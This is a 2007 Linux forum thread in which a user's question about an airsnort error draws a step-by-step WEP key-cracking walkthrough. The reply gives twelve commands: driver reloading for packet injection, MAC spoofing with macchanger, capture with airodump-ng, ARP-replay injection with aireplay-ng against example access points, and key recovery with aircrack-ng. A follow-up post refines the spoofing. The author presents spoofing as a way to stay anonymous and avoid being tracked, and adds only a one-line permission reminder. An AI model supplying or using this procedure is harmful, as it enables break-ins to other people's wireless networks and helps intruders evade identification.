LinuxQuestions.org
Visit Jeremy's Blog.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Software
User Name
Password
Linux - Software This forum is for Software issues.
Having a problem installing a new program? Want to know which application is best for the job? Post your question in this forum.

Notices


Reply
  Search this Thread
Old 06-14-2007, 05:37 PM   #1
Xeratul
Senior Member
 
Registered: Jun 2006
Location: UNIX
Distribution: FreeBSD
Posts: 2,657

Rep: Reputation: 255Reputation: 255Reputation: 255
airsnort problem


Hello,

I get the following error:

Code:
/sbin/wlanctl-ng eth1 lnxreq_wlansniff enable=true channel=11 keepwepflags=false prismheader=false > /dev/null
wlanctl-ng: Operation not supported

and this works:
Quote:
/sbin/wlanctl-ng eth1 lnxreq_wlansniff
Has someone any experience with this program to know how it works?
 
Old 06-14-2007, 07:52 PM   #2
Junior Hacker
Senior Member
 
Registered: Jan 2005
Location: North America
Distribution: Debian testing Mandriva Ubuntu
Posts: 2,687

Rep: Reputation: 61
What exactly are you trying to accomplish, don't be shy. I tried airsnort briefly with Debian testing and ipw2200, but switched to aircrack-ng, great results compared to airsnort. Aircrack also has a forum that can answer most hang-up situations.
http://www.aircrack-ng.org/doku.php
 
Old 06-15-2007, 10:05 AM   #3
Xeratul
Senior Member
 
Registered: Jun 2006
Location: UNIX
Distribution: FreeBSD
Posts: 2,657

Original Poster
Rep: Reputation: 255Reputation: 255Reputation: 255
Quote:
Originally Posted by Junior Hacker
What exactly are you trying to accomplish, don't be shy. I tried airsnort briefly with Debian testing and ipw2200, but switched to aircrack-ng, great results compared to airsnort. Aircrack also has a forum that can answer most hang-up situations.
http://www.aircrack-ng.org/doku.php
Aircrack-ng installed.

aircrack-ng -z or aircrack-ng -a ..? I am lost howto use it

Is there a frontend somehow?
mb http://www.clarkson.edu/projects/cos...guy/index.html
 
Old 06-15-2007, 03:19 PM   #4
Junior Hacker
Senior Member
 
Registered: Jan 2005
Location: North America
Distribution: Debian testing Mandriva Ubuntu
Posts: 2,687

Rep: Reputation: 61
Yes, it's not exactly cut & dry. First you have to make sure your wireless device can inject data to speed up the process. Some reading is required in both the page link provided and the forums, I had to compile a new driver with a patch for my ipw2200 to have it inject. Because you need at least 100.000 IV's, without injection capability it could take a day or two to collect that many, but with aireplay-ng and injection capability, it takes me no more than 10 minutes to extract a key from start to finish.
Steps for setting up your card to inject will be different from one card to another, this is where research in the forums will come in handy. I have Debian which has tons of Debian packages and also installed macchanger to spoof my mac as a mac address to any network device is unique and can be used to track you down, so spoofing your mac with macchanger keeps you anonymous. Here are the steps I take:
Code:
1: rmmod ipw2200
2: modprobe ipw2200 rtap_iface=1
3: iwlist eth2 scan
4: macchanger -m 00:61:2a:ab:04:c4 eth2
5: iwconfig eth2 ap <access point bssid>
6: iwconfig eth2 key s:fakekey
7: iwconfig eth2 mode managed
8: ifconfig eth2 up
9: ifconfig rtap0 up
10: airodump-ng --channel 6 --bssid 00:0B:85:7A:7D:2D -w dumpfile rtap0
11: aireplay-ng --arpreplay -b 00:0B:85:7A:7D:2D -h 00:61:2A:AB:04:C4 -i rtap0 eth2 
12: aircrack-ng -z -b 00:18:3F:18:0F:D9 dumpfile*.cap
The first two steps are required for me to inject, as I can't do it from the ipw2200 driver, I have to use rtap which is part of the patch to the driver. Step three lists all networks and information. Ipw2200 cannot inject in monitor mode like most others so step 7 puts it in managed mode. Step 10 starts collecting data, step 11 injects data in a replay cycle to collect data packets really fast, once I get over 100.000 data/IV's, which only takes a couple three minutes, step 12 cracks it and produces a key. All these commands are issue from in /home and that's where the data packets (dumpfile) are stored. It is best to delete them before restarting or changing network.
In step 10, RXQ needs to be around 90> which is relative to signal strength, the injection can take up to 30 or so seconds to start after issuing the command. I also pumped up my TXP power in the driver's makefile for my card from 20 to 30 to give my card better range, but the instructions for doing so are ipw2200 specific and were found in the aircrack-ng forums. I'm very successful with wep and have not found a need to look for a GUI. Steps 10, 11, 12 commands are issued in separate terminal sessions.
EDIT: Make sure to use aircrack-ng-0.9 which has pwg or whatever, otherwise you will need at least 500.000 packets/IV's.
Remember: You cannot use the key without permission from the network owner/administrator.

Last edited by Junior Hacker; 06-15-2007 at 04:11 PM.
 
Old 06-15-2007, 03:54 PM   #5
Junior Hacker
Senior Member
 
Registered: Jan 2005
Location: North America
Distribution: Debian testing Mandriva Ubuntu
Posts: 2,687

Rep: Reputation: 61
Also, most instructions using macchanger will tell you to use it when your interface is down before bringing it up, whenever my interface was brought back up, the mac being broadcasted was my original mac, so I use macchanger after my interface is back up. During Step 10, once your computer is associated with the AP, your mac will/may appear as a client, this is where you'll find which mac is being broadcasted to figure out when you should use it.
 
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Airsnort firedude Linux - Security 5 08-02-2007 05:23 PM
Problem installing airsnort m4a2t0t Linux - Software 1 03-03-2007 01:07 AM
Airsnort Suse problem sam scott Linux - Software 1 03-16-2005 09:24 PM
FC and Airsnort imonfya Fedora 3 10-20-2004 11:16 AM
Airsnort problem antipro Linux - Wireless Networking 3 06-23-2004 12:25 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Software

All times are GMT -5. The time now is 12:44 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration